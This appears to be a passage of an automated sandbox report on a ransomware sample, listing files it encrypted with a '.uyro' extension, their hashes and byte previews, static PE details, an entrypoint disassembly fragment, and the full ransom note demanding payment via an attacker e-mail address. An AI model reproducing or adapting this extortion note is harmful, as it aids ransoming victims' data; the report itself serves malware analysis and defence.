Preview:	MZ...$.t...<.OED...z..R..V..P.Tm@....3..1h.. ........M.....[..Q.I.J>4..t........3@.V....^.R. TA7.....G....y...5Qh...,..&t.@bF..+.....r.&B..S(.........._....=. X.W.(6..qD.r.j.0l9....K.E..;..O.B..y..Z.........d....b.......=...`.p.m.Hi.B..%..'mZi.1s.......t+<.#S..o.....,....t...Y.(\N.p4.%I...p..........).L..W....C'..TS..Y=..+.\|g...B..D.k.fCY.k.'2...\|..,.u.f..6...t..k..v.&.9......].1.&h....78._...JWF..V..& .[....iF:.M....\KH~n.I\|.[,X.W.8Hy.J..U..../.....J..!..m.e....T)...C.,.<...l...f_.wo.@W.%. dT`...~.2;..0.x.J'..l.+.:uc..C\|.fhz..d.j..=ZT>..w.....O.T.........@_X..c..<...w.U.)..k..2.D.S..!.AKeo..?Y.D....]....2kj#.k]..(+....#...s..)o0....W.D`.....h...<........Bv..<.........NX.E.yD.o}j.......5A..2KUy...-/.R1Z.{.KG........(.:..D.(..IT.FN......p...,L\v......rRp..".gr.2z$.mW)..I...B\|....gQ....Q..;8.a.M}.x.G..p9{y.]p.....w...,.......+I.7..;FX..AA.....]..\.................^.]..$..(`'.....).M!.>f4).O..............{....J.....F...,..vY.*....,......JW/

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	27470
Entropy (8bit):	7.994097843569195
Encrypted:	true
SSDEEP:	768:zUqjBtOG3DrOVLiFNQ9ng8mR14zUsrTaSb:zfj3HOVWU9nhmvqd3aSb
MD5:	CB7C4BFA4EC4FFFDA0B9E3D4AA0FB817
SHA1:	5D5F5A21CDBB00EBF4E5C3783FC1A6414E49A24A
SHA-256:	EB60C24394F2A39A877919019B85FF52C528D561409BE2AA5263464BC0C14A0E
SHA-512:	6520A837FC150EE4B30092677E6269D32CD6AE10770D944F8C2535856EC39904FD02F5DFED47AF4759C96C83C17000BFABE1743532C506787004286A27EDFD53
Malicious:	true
Reputation:	unknown
Preview:	MZ....{5....G)\....^`.tv-.NK......%...Z............I.6.SV......vA.......b.y...-`..".x.o..Y.{......C.3.3..Te.(r&.3I.RP.7..-..c.1..x.}m@.<l..kB..[..o.&GD.4R..H.$m....a....vY..5._<jB..U..)....h..3.S..5?..=.H.y..F..W.#...8..sP.1.Nu.i..}'.H...;l.i.1DT..O]....kB..\|....[5JF0.L.MmcL......h..b....._.K..5=Kw........T+.iug.......%p..8iH".Z.....i...u....R...7..Y.8..ac....W1w9...N..."+A..?BZ....v,3h&.i4X.L8*e.q...5..Z.Fd.lI..tV`.}.J0....r..Av..A...$KI^.......z.....o...q.,..A.D...7.,. ..jf..<Gz..w.....?..D..l.A.....)L.<S$W.I..\'...Yy.{.X."..:.T..Kq.;..2.:.2.8...F..Oq..PC....~Kl.,..r......j}.......++.a...5..>.teK...;.b..q=...0..r..8.O_7..#.O........bsQ8...Hp.....j..>.....j.F.oQQ.5.{..=fFu.{BHT..S...s+.&..@.v.ee....H...=9.....=.....!...........?.l..2:3EBB2CH\|..v....<1.I..E.y..L1..B..l.~.f}`.Ba.{Eo6.u...;.bK......]_..m#.jXK..(l...Kx\j..<.y`.1.b........X.x..0Pk^....}[A....}.b.+\;....~.+......y...K..n..#.~.<_....v...D....h.h.9L:.....2..._..~...<.....I

C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	6478
Entropy (8bit):	7.970634680503557
Encrypted:	false
SSDEEP:	96:4HYKbI+IMdl+Uj+L3LgArEFHXdWUW4Pmb2mjCu3BAjzlqHamx8vny3JcKh4Kv:QFzBqrEFHXdWUkhjCuyPYHamC813v
MD5:	5019C64F532D319479BD3C4CCD653466
SHA1:	6437D81222F5DB495A2AA1415249D7665CA8E701
SHA-256:	39692A663FFE6B3AB68895B0A2C563BB9AE74304D310FC61E724ED2563F804F9
SHA-512:	D5182910678F05ECFBFA03ECF57C1AA5173D975E6C0B1545670FAD2282786D48D7AC6401DF79ECC80AF8EDE9861244F69BB6C512A6DD3B5117F0E938C599341A
Malicious:	true
Reputation:	unknown
Preview:	MZ.....x..s.....J@\...[.2-.X.R..>..[.b{.y.........\J.!...['...[.`.2]V.>]O..........&@.~1+_iR.....!5x.v....#...R.....=..<H......(?..=o#..ArrE.l..E27u!...).1g..J...K...#}....3......vK.......\/.].27..e.+.\|\.~..D.,MU..OR...3....J\|...q%.Ka...z..m....B...\|....[...Tfb....xp..S..b..U.\&..\|6.....,..V";...^l(]..w..].."q....].....k...C.jU,m..`\....~....99,...O.X.wQa4YHD.O..<...&..R[......r?>.uc.i.4;.$CZ.n^j...3......\|.O.ZuJD2E.I.eV..RMj%'"%u_.@...<.u%..w./..4.y....i..9.^G/YL.d.~bdc.M0....-"..?...n.>......~K_.f..d...Q_.....j".!.9..e.p.....KxW....#...?.....E>=vR.w.x.2[.=t.FQ.Z;;..'..z./>.w.Q...V5.w.".x....~.\|.z.F..T..kl.B.UH.z..6y..`.+T.b...z..........?[i..1.e.[)..)j)h..-...1.2.} ..O.....YWc ...\hF9.....g..R'g....U.0SH...{..Y.9..d.........n~...,..l..}iD.!y..8.xYi.U..:3.P..T..mT......B.Tv....t...v.S...`...........D!;......r.0..{.9.Et...'..........@.L`.^V....A\|..w..].0.5p.kq..v7...-.\M........w..<..H4x@...C...w{..%...5...}}..u*/t.9W.x...a.M.O.)..m?.C..;..

C:\Users\user\Local Settings\Temp\JavaDeployReg.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	423
Entropy (8bit):	7.464646620787414
Encrypted:	false
SSDEEP:	12:oVFXzivqwXJcHINM3CedwWfTvAdtcii9a:oTXziCqcHIytnTvubD
MD5:	26093470C1E0344CF475CD3539DEAA25
SHA1:	4BACB111A8160D3686F8D5EF56F6074445FB0B7F
SHA-256:	B3DF34E968ACF7FFCDD73E211BE5DF2136BC1E929F506EAA9A1CD8F8FD61EE15
SHA-512:	A8B04725AA0CE44BCDFAAA3B115C6F5E28C8284626B4F1C5E78BDE5C9B61BAAF650E0799E95589A32B707F30EDB854F5DDD5DFAAADA4AAF539E1C9BE3D03D18D
Malicious:	false
Reputation:	unknown
Preview:	[2020A.I.w\|....L..3...c..om.n...Z.2.Wlp.w&.0.0?.........$........;.a.....o....5..+...+..!...Z.._.a......j"..<&i....{F....4{/A9.K..\|.\.n.i..&.......K...h....;t.O...-Gb..2+7TP..K.k.!........3.]..Y.8..:...l.....w....1...-bNH.....#.6......^.......5U..b.n..y_Fs....+.<.TU.-\|..C.E9.....<.9../......._....T8...,)........8...wQ._dK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Temp\SetupExe(2020072310200717D0).log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	313044
Entropy (8bit):	7.13025521202577
Encrypted:	false
SSDEEP:	3072:dfekjqILa4qNJafidxLBvUA/WALUEoZ9NEgV95YM92gO+oGsHIX5jVAg8M5:dWuqImHnjTVvnWALUBj5V9mxCod3M5
MD5:	2E7460EA9EB50FC45DA2AE2616DB0C81
SHA1:	4BDFDB9A91D76D8A50BFE4AF03AF66BC0B28D394
SHA-256:	0A29EC8AAC0617CA4D9CC18CF0A3047955A721D689485B9DF4670D483B5E24DF
SHA-512:	BDA37A5892B0858012E35A794B58640D15A7B12FDD04AE596E7418EB3B6D6AC3B380080B841398DB18DB3690A44A532CC90880B21124B8A20074038E4CC08E0C
Malicious:	false
Reputation:	unknown
Preview:	2020/..Q..@..i".....:.6...b.H.'Dz'\yfg?s..V.E.......f..,......).uXXdz\...GY...1........#...n..4.qXzP..J".....4kt....v\|....;$.PD.;e...r.....f..1.Q....Z:b.Z..M.ZI[L4.......u8l.#.c_]...+S9..D.'.. ......(......0x...:....[.......f........p...-..&....-.n.f..\.y. ...d.R.....u.%.....#.......d....#..2.Y.q...M......+.\|.r7...6..6.}Z.&..P..._.Ua1..j.....rT.YK.....w..^....S..[.........w.$...^.MZ....QS.!_.Ok$.x...Q.5.6.....{ds).bF....o.x.{.V...V.. .o:......kt.L.t.......z%..1....u.....^...X..v.2[5.........a....z&...vVF ..c..._..6...._q.`..I..c..i.)h.x.~..K...xeI.(.7.Z.tn%9...Aq...S...-...3....X..x...............).d.-..x5..dW.:Z.}>......#.[.gke....{...F.5..q3.'x..bN../..U..N..J..)K.92...R..'969N..3.j)H.K....s+..0.0E..?Ng.w6.z.....U.<.v..g...D.?.o....K\|..&..]...ec!qW....$.[..r. J...&}.?.L.>.q.._9u..Q......f.j...8.Zsy9t.U.f..IS.5.)..r.bn(.........y..1..C.......\|..D.]..i...l..e*hc> :....(.Jn.Y?...\|.-..CQ\|.....-...........\|Ui=.FW........\d.w..K.[...A.c.

C:\Users\user\Local Settings\Temp\chrome_installer.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	23217
Entropy (8bit):	7.992370750243413
Encrypted:	true
SSDEEP:	384:2vEs7qdp/MSC+cV42fFdlOI7RLOZZQkE147gh28wdxNCflic97nNGmRzoYJxUE+v:2vMD9C+qVblXLOe14uOxN8N7nwmRBJGN
MD5:	1393B57C13CC0766F5733AD7FE3FE214
SHA1:	28A6E671AA5D4AE77E06382489E47F731AB1DBFC
SHA-256:	C5CC1D169187E22D9E6BF16C09FD759BFB1F282D7489F367AEED6ABA145CD4A1
SHA-512:	CCCFDB926476C8FD9EBBA8110A21BE76AA69F63A95B3718EC7EA917966E2FDA6C70C1C3B72A254E1AA6FEBDF3FB4FFCBF04D9F9580E90BD9BA200AFDF19FB93B
Malicious:	true
Reputation:	unknown
Preview:	[0930.%..aL'.~......5.....M..=.ZZ0."IQtv.....M....q...I..'.9!..!S7f..5.&.P.I.............S.......6.R..sT6^..nY"..@[....g...Ql00.`^.a..6<..L....iVA.>-v[...j,.iE..J......Xd...H....EU:.......ug...D.=+S.F..7.J^..<..j.&..... xX\|zi..cS.;.z`./.......lo.C.e.AB...DO3..'.R.o./hA....M...).....nw.....c..m.....J..M..:.x..s..=!Q.....d..?....P.BR; ..\m..w.d.........D.j........N..6k>....EF..F....2;...x.B...^../....f.zc'.K......)Rl[;{R.....8...t...T.....0.,....>..,i...f..k4@d.2.0.R..B..\;q.......{....0...L.w......`&#..OFz...?..^.....j....fy.s..tWQ.j.h..t\|...........u..7....8...{..X.3.RA.h..i&.y:....Z.#..h'%V.....?....{.Y..t..K....\./....d..$.V......Ta...n.%(..y..Iu.....3..h8}._...H.]a.+g.."..38.WeB.s...h...\....c.@...T.....+j...:...C.....9m8.\|/]..._..b]../..iZ..C.......?..~...U....e.@\|<l.......1.(.@xKml0.2...o.{$.v.7.....e...3N.`..*..k.Z.3.O..d.>1KP.....V.....)y..3D..oi.....62!.m......................E.....T.t$~:.q.:..C..<....$..W...30./.

C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	680782
Entropy (8bit):	7.986709275401265
Encrypted:	false
SSDEEP:	12288:B8Odvb52bjFgvC1p3YdF8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlSV:+rjqvC33+d9V3U/XZPwYRGQ6i5l5k5l4
MD5:	00CD000795D4B83B9DA0B4457B6D58A7
SHA1:	0B11A1434D108FD6E552DE3D314C6CBD9696C507
SHA-256:	E6017AA15D4E999121CDDB656EB9B4C1FDB9A785E93CCF4136269F26701F002D
SHA-512:	9F5410B2694A48ACDEFBC2BB0639618A5E46795F2AB06D6F5ACD16C2874EEEAD14AB79808161BA9FD1C99BB78F4041877F9246DEC77B1C5A6B44C867D8E935E9
Malicious:	true
Reputation:	unknown
Preview:	MZ...qD6.o..t.o........f.[...Z...........>....nLy......WS...DI...My.~......8...H[..3.W+..l..Rr>.8...&..$Fc\|O.tx..Vr.bn..GZf.a.i`..J{.H.s..-.+.M@....{....Y/..0..1.-.%z..K..`..~~..U.A(T.....7..C..@....3..0 ....$.'._....YeP.6....h_v'.K......\../.O!....k.d!H......:.....W6..o...i....V.e...>..at.9..~@Vk.NP._$3..v8.~.....H..9..H>...e!H.~..eIy.cCcv.S~.o.umA.fi...{....R...V.....j...VFn......&..B.........:.@;.......>......@.U.}2.`..-.?1..2.3.o#..G.r.......O.:..=.z.(.^...U.F.&5.F.>....k.4...%.80...h.....S...H.........,]..%.~...CAd....ix.).V....-.e..+..>[..].I.]..a....jo.....Xe~...!l3...o...%....B.......hB.rc....$...%.[....4.".B...8..].l......p;R...."p.,lC..z..;./.+.[.....+...::s..R.nP.5...)...dSVp{.....A......c...,J..w.n.yZF.J=.K.7.(.%.....TT.....P........Cb.T..P\....Q....).e9.`.-...w,2..B..h.....NF...3.^&!C(If......f.i..Y...Y.....v.Q#..U..\pV...B=...(@.J..%W....-.G...bi!.K....@..!..!...c.k...3.0.2.'5......zp.gF.g..YN...........Y.....

C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.99601147550486
Encrypted:	true
SSDEEP:	768:/QE7Uxuqtl2WjfVcz2RMxTsXiIVLirsJrXo9a/L04rlELAMdMIKpSrXRM6PlSZRm:YE7aPWlts9Xow/vmMNyrtSq
MD5:	763B0B08AB2786BCA831FF3A08B540A2
SHA1:	2A598C6EC0BA38CA54803339E4B7FA43B702EF26
SHA-256:	29EF828E030EF09C4FA572E4443C7634CE77A4A74603BB97006890AB70EFF943
SHA-512:	D67366477AFBEF63FC1382177E0FCF7BD9102343A4784F38AAA4601823E12BAE549AD229FDAF04B6AB5F892AC6BC766FE1EDD705535F97CE68210682402D8FE0
Malicious:	true
Reputation:	unknown
Preview:	........H'....Rg=\|.kP.Q.b..0@{..g...I..1#......j...\K>.'>q..._...../.....z...#./H......).8r...G...ZPh.".22...6{.T.....4Q:.2........V.....F..f..A....b,.@a.z.....Re.Sb?.Z..)s...k=5.,(....HT.\|Kib........}...xc...4.`...e.o".r.......7.....m....Q...X...PIu..5..0Z.a.ngv..N2..:.BFa1....A..E....9q......;.?)\|...X;C/kJ.P..v.j.....G"..,..c.....K...X......d..N!....oZ\|.Xe.....s6.u$.YS..^.{.HE..D.8).C~:..8...\.4~R~.m..TSF.3-...N.f....'OW..#+.X$~1.......S.V.I.=j.7.i8].h...D.4[...u.....p.......I.}.....5..X..i..\|.l=./sg=..[..+B.......Y....}....>..c)d..y2...Q.lG....9P...?b........E.R... ..n..V.F.U......7....}{....e.......^_+.@%FW...o.....}....`...>J/.a..@...t...O..........a...Wt....`..#.K...?Y2.....<....J0..B.ljc.g@..X....I.V...R.2Y....(vT,.(4..L...+..H.t?l5...-r..Vu)..wF@WG...;>...8..W..qX.g.a..QWlIc..N.[. ..a....K...B<C.&.xd...\|l...):.....%0sO..w.}..:../.&.....m[3Rv.9..'.2....s.8.....dL.)...2......gs.A......5[..b........w..UyP.A@..Jsv.Rx..8L....~...

C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	123350
Entropy (8bit):	7.9983303108315695
Encrypted:	true
SSDEEP:	3072:WMu3agWD0x5iNCgDCxgMvSYecj1KicervjcP+:WMKWDCb2C2cdx1cekP+
MD5:	8C46C5780F5706F688FC8E3A5E54D32B
SHA1:	80B3665F976901070E8ACF2B6B8046D0F7963979
SHA-256:	BF94A7EF62A12893AE32BE08B274EABEE938D38E3E62C36738C7BD9EA9901C88
SHA-512:	7F540F878521B99D23DE659A8E4967848B01829F7AF1F3AFE575801F95ECD0379DE6565E1943733F6A7E35E2D681C56CD5E49A9D631FB4062D8E8B6D5196FCD1
Malicious:	true
Reputation:	unknown
Preview:	0.rJ..v..f...._..%.eR..S.z;.o!..R.........6..1....w..9dD.\c.!..z.;S..:....k,=H.....o6.?.M].bw<v....\..y.YB....D. ...po.....rU...8nb...B.......gu...1,..u...s.;.y...T2.....M....j....t...2.)..>)\|K..;..,l`v.....#.d.)........(ID...k.9.Y$.de\|Z...Ar.0)...J......j.R........K+....$...,.p....(]0..'..6$.TU.>.LD.\|...o/T...N.G.S.I..k.a.a.v..>.xB.z;..S.....bl\....W..W.?.Z.Jy.c....o...U.%...XH7.....)..6..8.D.)U`..4.%....`".D...Qh.c...........p.......S.G.RB..f#..,#.{8j...k@....Vk{.qe...(..$.!;Du.y.]q..Py...)....Az.z..Q..f.x...,......U-:.S ."`..qvc".o...i....., .5(..B...q..7.E..Z....~..1.....}....<yJx}.{fA+r.-\-.W...0~7?.........3...w.i........ b...}Z..A.u..6..B..zCd...T......B.b...:o.c.@'O...X#MKRW&.kz.r.r...o..RuS...%8`...$:pZ=.\:e.......vO...>D.Y.E..o{...\|..4.cYE.'sP7B.....C(V.s%.%`...:.....'r.r0.~.v...0ei....[.M.h.&h..a.....UcH..%y#...t8+....4*l^.5.O._..5...\|.B$.s.....XS.......M.<...F".u..u`.....6?..b../..S......W..J..6.&.7..h..u.%R..I.'.1.,.

C:\Users\user\Local Settings\bowsakkdestx.txt.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	896
Entropy (8bit):	7.743087941229848
Encrypted:	false
SSDEEP:	24:YE+LwUoe/v7MqBoPhWzgq+ddGO1owdiJ9ubD:Yb0Uomv7MSyhkgq1O1oUmqD
MD5:	3F8340F8DB9ED4F36F0607ED8493B7F5
SHA1:	7E55FE91F0F0A427C333AC9E24258AEC9A8ADAD0
SHA-256:	26D21583DE314DE53E901EAED4C602C4631B5CD77692CA5C766F6CDF67E6F125
SHA-512:	191B161B9D410F3A61A8EBCCD6706CC878DD768D0C766A27883745C046BF1D5ADB9D3F4DFE17282FF49B195DE4B01DACC437C780DC2F4A64E509829F0F3A9086
Malicious:	false
Reputation:	unknown
Preview:	{"pub....Z.M..X.].&iY.D...){8t'..D...[#..m.<W.3...c..70..J.A(qt....rRh....7.i......j6.........=._......... .. l.4.......D.9Z.^.l....WT.n.2y\|Z...t.]w^.L_.O\.....YNU..P.{I.^.......f.......#h.I`..Xub.'.B;..ch.D...j......(z.q2[,.WR.~X.( .\|>..@5.......\|...o.dQ.M..R.}5..d...&.h,....Mw,3.1....y...>.i.+".,].l..by....fGs'l........F... .jC..x.w.v.D..}.s.,">e....mw.x[.[c..M.Ut.2y..5......$c..R..w...n.l.q..s.....C.....U..?........!..s..I9.0..Qc......)7..r0... .....K.%j6.\y....Z.....-.o.w..I......Y\|..\|...`.[.....kv..._L...[.E..]M....U...F..s.......Bi~..1......M.K~.....\.FR.......'9.WY0.f.Q.....n.8Z....Uw._...3....... ..gO...$..V.k....=.6.h-........f.'..H........V..=."...r...0Ny....FA...}...0.79..{S9. ......P.<.2...Xm...Nwh"..'..5cr.!P.&.15..v(.<D......>....D..#.y...ULEk&.+.K....W.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\SendTo\Bluetooth File Transfer.LNK.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1383
Entropy (8bit):	7.860406376142274
Encrypted:	false
SSDEEP:	24:ocii2TuTMeJb8OMK/ItN0nT0UX+lZyGMV0eZ//sbD:MI8OMK/CvUul490eZ//mD
MD5:	26C6DAC0D3836BBF5B23F94AA4AFCD4B
SHA1:	681656652FB985C466B966053597693F172744B0
SHA-256:	D636E6D2A82FB03ECABE7EBAA0556873CB243F950F8C11F2FF503C27A12F3E03
SHA-512:	B57E34482CBC23743D8EE97FFDCBB3E56FE412F4C2C9EAFE745792D581B60E1E2CCF7CCE18BA756DD160CB05CA4981FF143A071F54F9CA5CD734E5F6A6BA6419
Malicious:	false
Reputation:	unknown
Preview:	L....4....e.,.3.ff.k......}.l.......R.....J....B..cat.......n.NhIM.Lk....6.6.c.#..>.&..9.......F...]..d.`...='.)...).p.gp...RW........YT..j..P........[...#...\|FDu/3mVRU[.../n.h...;W,.G..d..7~SW./.....R]...s..l.......).A.{]..s.5G........8j...;..N4.#.H}.#.....:.#l.2.....$.....f......g..zB...,.'....o.\:....=....}U!...H....'...U.....t..0.-..[.'Si..2A.<"..tE!.If......T..PL.&.....J..x<{..k0,.Ta.e..A...-.%9+.P.~...c{.. :ME.......>...[EuXs...0}n....b.%:.c..2.3....n...@+D.l...)?.....3.X."O.[=.w..,95...H.....0....kM..".=Y..3.N6..G....>X..a.....Bb...e.z.....!.[.p.g.3.jK.xX;..4..t.W#..v..U.......xo...l.......\|...J.[.c.X.J46..4...u..()..D...Q....I.(.:_..~.vt.S..I...O.U.!.."......X......s...p..o-..9.yW..6x..I..o=u.:o......mZv....4K.fiPY..4'c..I.........`..4.J GE.a...(.d`..S.Qh...<.X7mK.\.^.)k..;.Z...LI.^!._.V.c..c.....~J.G...~I/^A..b...7.%{p}.B...u$(.........!T........H...\.&.E..QC5].Y.].f[...z,-0...[50.q.4...@.8Rc.....?.".V..f.K:.F.....?.h..=..}E....

C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	341
Entropy (8bit):	7.262656928245754
Encrypted:	false
SSDEEP:	6:14uyfZvjKCRooGrxqTdUAlfsXd3mnVHY/ovZ86dkqmamF3bhB4GxntHcii96Z:ujKSmNqTaOKdmbRf0NXtcii9a
MD5:	2DAD5729F6EBD121A7A4325D9F0F657C
SHA1:	17DC444C392F68BD99A8CAE5251C43D5A469CCFB
SHA-256:	B025F29713B6E35981C8A9196689629682242EA1C60C82A0C9AC9B3C2FB271CA
SHA-512:	969EB90EBBF0DA82F6AEFF61B0B3E4AFF41D0A49BF6DBE279DB6D3D460FC31E20BDD4A41B3DFF6739782FE88806FC6DA717FCCD7B4C1904B386D0C97A409D83E
Malicious:	false
Reputation:	unknown
Preview:	deskt..w.....o.y#...7n......K+.w.;.R .Q..Ctm..zc.....B!.Yt......T...nO.q.t....>.)..J>...A~..'..eA.kx..X....A......g.6>&.eg>.+.-...Fx.H......k[=D..<c,..).K...`.~.bq.<......w.aE_.U..b.........A<....Q..+..v..u.:.\|.d\|/HS'.!.>`. .......Z...4hWB...../%\<6.1.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	4.8807470237239885
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWBmFRqrl3W4kA+GT/kF5M2/kfw3KTJmwI:WZHfv0p6WBPFWrDGT0f/k3q
MD5:	9D5D26B904CA25C7E73BF1CAED680370
SHA1:	63A490BB891A3B329B2BB9A9B11532B2A265A6A8
SHA-256:	B2EEEDA8EF0D8AC810F6E2ACBC4C1658836559AE3FAE5FD76F965A7E58C6E285
SHA-512:	7DF594F18F89316E3B572A36E11FC2C66F51592BC2D3047D2E4ABFB1580607C66C7ECBA2293CD36BBA500B8F13CD32201C5C8430AE71D3B3985711393BE9AA4B
Malicious:	true
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-5UcwRdS3ED..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@fishmail.top....Reserve e-mail address t

C:\_readme.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	4.8807470237239885
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWBmFRqrl3W4kA+GT/kF5M2/kfw3KTJmwI:WZHfv0p6WBPFWrDGT0f/k3q
MD5:	9D5D26B904CA25C7E73BF1CAED680370
SHA1:	63A490BB891A3B329B2BB9A9B11532B2A265A6A8
SHA-256:	B2EEEDA8EF0D8AC810F6E2ACBC4C1658836559AE3FAE5FD76F965A7E58C6E285
SHA-512:	7DF594F18F89316E3B572A36E11FC2C66F51592BC2D3047D2E4ABFB1580607C66C7ECBA2293CD36BBA500B8F13CD32201C5C8430AE71D3B3985711393BE9AA4B
Malicious:	true
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-5UcwRdS3ED..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@fishmail.top....Reserve e-mail address t

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.904357034984543
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	U59WtZz2Sg.exe
File size:	680448
MD5:	41001fdd7879ce9ede214e92c7e492be
SHA1:	215964b0399da37b41b7f420806a72feb72a7c28
SHA256:	aaef58ede9edbfc0cbbdd3dc7abfa9ae0f977ed1b33af4f5d7665123187801d1
SHA512:	1d125890b19e323fd3a67b3b2575c97df72f4f8b7f13d5e1d3e010063b88cc40a6f55d25513ada752992434f0b1d350152798381d43cb2ec591020c85eec44d9
SSDEEP:	12288:Q2lMqUe8G9qSkYuZpeKF8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlS:Q2K98cT3d9V3U/XZPwYRGQ6i5l5k5l
TLSH:	CEE423217A90D073C887557079228662773F757328FE8C87BF5198E51EB22C67A1A38F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....Ib...........

File Icon


Icon Hash:	d4b4b0e0e0eaf0c0

Static PE Info

General

Entrypoint:	0x404c97
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6249E282 [Sun Apr 3 18:08:02 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2ac0f7085258eff31142b9f87cb0f218

Entrypoint Preview

Instruction
call 00007F3200A3565Ch
jmp 00007F3200A2F83Dh
sub eax, 000003A4h
je 00007F3200A2F9E4h
sub eax, 04h
je 00007F3200A2F9D9h
sub eax, 0Dh
je 00007F3200A2F9CEh
dec eax
je 00007F3200A2F9C5h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F3200A30BCEh
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 10h
or eax, ecx
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov ecx, 004A33A8h
add esp, 0Ch
lea eax, dword ptr [esi+1Ch]
sub ecx, esi
mov edi, 00000101h
mov dl, byte ptr [ecx+eax]
mov byte ptr [eax], dl
inc eax
dec edi
jne 00007F3200A2F9B9h
lea eax, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [eax+ecx]
mov byte ptr [eax], dl
inc eax
dec esi
jne 00007F3200A2F9B9h
pop edi
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0000051Ch
mov eax, dword ptr [004A3FB0h]
